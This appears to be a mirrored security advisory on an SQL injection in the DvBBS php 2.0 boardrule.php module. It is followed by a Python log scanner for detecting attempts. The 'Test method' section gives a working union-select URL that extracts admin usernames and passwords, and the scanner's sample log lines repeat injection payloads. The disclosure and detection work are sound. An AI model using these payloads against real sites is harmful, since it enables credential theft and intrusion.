Dvbbs forum (DvBBS) boardrule.php module SQL injection vulnerability

2009-10-12T00:00:00
ID MYHACK58:62200924990
Type myhack58
Reporter Anonymous
Modified 2009-10-12T00:00:00

Description

Affected system:
Dvbbs forum Dvbbs php 2.0

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 36282

DVBBS is an open source ASP web forum program developed and maintained by Aspsky.Net.

DvBBS does not properly filter the groupboardid parameter that users submit to the boardrule.php module, so a remote attacker can perform an SQL injection attack by sending the forum a request with malicious parameters.

<*Source: Securitylab.ir

Link: http://marc.info/?l=bugtraq&m=125207676114405&w=2
>

Test method:
--------------------------------------------------------------------------------
Warning

The following procedures (methods) may be offensive in nature and are for security research and teaching purposes only. Use at your own risk!

http://site.com/[Path]/boardrule.php?groupboardid=1//union//select//concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)//from%20dv_admin%20where%20id%20between%201%20and%204/*/

Recommendations:
--------------------------------------------------------------------------------
Vendor patch:

Dvbbs forum
--------
The vendor has not yet provided a patch or upgrade. Users of this software are advised to follow the vendor's home page for the latest version:

<http://www.dvbbs.net/>
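While no vendor patch is available, web access logs can be checked for requests to boardrule.php whose groupboardid is not a plain number. The following is an added example, not part of the original advisory or of DvBBS; the log format (Apache/nginx "combined"), the /bbs/ path, the sample lines and the assumption that a legitimate groupboardid is a short integer are all constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request target from an Apache/nginx "combined" access-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate groupboardid is a short non-negative integer.
NUMERIC_ID = re.compile(r"\d{1,10}")

# Constructed sample lines (documentation IP ranges, hypothetical /bbs/ path).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Oct/2009:10:01:02 +0000] "GET /bbs/boardrule.php?groupboardid=3 HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.9 - - [12/Oct/2009:10:01:05 +0000] "GET /bbs/boardrule.php?groupboardid=1//union//select//concat(username,password)//from%20dv_admin HTTP/1.1" 200 812 "-" "-"',
    '203.0.113.9 - - [12/Oct/2009:10:01:09 +0000] "GET /bbs/boardrule.php?groupboardid=1%2520union%2520select HTTP/1.1" 200 790 "-" "-"',
    '198.51.100.7 - - [12/Oct/2009:10:02:00 +0000] "GET /bbs/index.php?boardid=2 HTTP/1.1" 200 9000 "-" "-"',
]


def suspicious_groupboardid(log_line):
    """Return the decoded non-numeric groupboardid value, or None if the line is clean."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    # Compare the path case-insensitively: some web servers ignore file-name case.
    if not target.path.lower().endswith("/boardrule.php"):
        return None
    for key, value in parse_qsl(target.query):
        if key != "groupboardid":
            continue
        # parse_qsl decoded once; decode again so double-encoded values
        # (%2520 -> %20 -> space) are judged on their final form.
        decoded = unquote(value)
        if not NUMERIC_ID.fullmatch(decoded):
            return decoded
    return None


def scan(lines):
    """Return (client_ip, decoded_value) for every flagged request."""
    hits = []
    for line in lines:
        value = suspicious_groupboardid(line)
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}\tgroupboardid={value!r}")
```

Access logs in this format record only the query string, so a value sent in a POST body is not visible to this check.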